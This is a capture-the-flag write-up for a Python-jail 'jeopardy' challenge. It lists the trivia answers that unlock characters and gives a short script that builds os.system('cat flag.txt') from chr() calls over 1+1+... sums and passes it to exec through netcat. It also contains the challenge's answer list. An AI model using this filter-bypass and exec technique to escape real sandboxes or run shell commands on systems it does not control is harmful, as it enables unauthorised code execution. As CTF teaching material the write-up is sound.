Tags: jail jailbreak python-exploitation
Rating:
# Problem
We're stuck in a python jail, and the only way out is by answering questions on a variety of topics. We get only a few characters to help us escape the jail with each correct answer.
![A conole displaying a table of jeopardy categories and dollar values](https://i.imgur.com/xnASd3j.png)
## Part 1
The first thing to do is start answering questions. For the most part, this just requires OSINT. Tantalisingly, one question is worth $10000 (and presumably every character we'll need to break out the "normal" way), but it asks us to find a password that's accidentally typed in a presentation (and we don't actually know where the video is, just that it exists and has to do with UMass Cybersecurity club).
For our purposes, these are the interesting questions:
* This year will be the next y2k thanks to some data types: 2038
* Where was the old honors college located? Orchard Hill
* What is the name of the mascot of UMass? Sam
* University of Michigan researchers controlled a Google Home from 230 feet away with what? Laser
* This was the most popular OS that was used in 2020: ios
* The answer to the life, universe, everything? In binary, of course.: 101010
* Country that US and Israeli has made multiple worms and malware against? Iran
* Movie where tic-tac-toe used to save the world? wargames
* Band that was recently threatened to have unreleased music released unless they pay the hackers money: radiohead
These nine questions and answers give us enough to work with.
## Part 2
Probe the jailbreak a little bit. You'll notice that it tells you when your code throws an error. So what if we just type "os" (assuming we actually have those characters). There's no error! We don't need to import anything, so we don't need those characters.
## The Break
So we are relatively limited in what characters we have, but we really want to run something to the effect of "os.system('ls') (and likely then "os.system('cat flag.txt')"). We *could* spend a few hours of our lives trying to find the video with the password for the $10000 question, but is there a smarter way?
Yes, there is. Because although we're restricted in using certain characters, we have the characters: c, h, and r. This is enough to use the 'chr' function in python, which converts a number to an ASCII character. "But wouldn't we then need numbers?" you ask. Normally yes, but we also have 1 and +, which, if we're patient, can be used to make 1+1+1+... to any number we need.
## The Code
I'm not patient enough to manually type out the right number of 1s, so I used code to do it for me. As you collect answers, you can put them into a text file as a list of commands. You then make the last line of that file "jailbreak" to start the jailbreak process.
Run the solve_jeopardy.py program and pipe the output into a netcat connection to the host.
### solve_jeopardy.py
```
with open('jeopardy.txt','r') as answers:
for answer in answers:
print(answer.strip())
a="os.system('cat flag.txt')"
def ones(x):
return '+'.join(['1']*ord(x))
print("exec("+'+'.join([f'chr({ones(x)})' for x in a])+")")
```
### jeopardy.txt
```
ready
miscellaneous 100
hackthebox
miscellaneous 200
ios
miscellaneous 300
101010
miscellaneous 400
4
cybersecurity tomorrow 100
quantum
cybersecurity tomorrow 200
2038
cybersecurity tomorrow 300
humans
cybersecurity tomorrow 400
ARM
cybersecurity tomorrow 500
deepfakes
cybersecurity yesterday 100
captain crunch
cybersecurity yesterday 200
wargames
cybersecurity yesterday 300
iran
cybersecurity yesterday 400
reaper
cybersecurity now 100
39
cybersecurity now 200
laser
cybersecurity now 300
radiohead
cybersecurity now 400
microsoft
cybersecurity now 500
dog
umass 100
sam
umass 200
dining
umass 300
franklin
umass 400
orchard hill
umass 500
jolly roger
jailbreak
```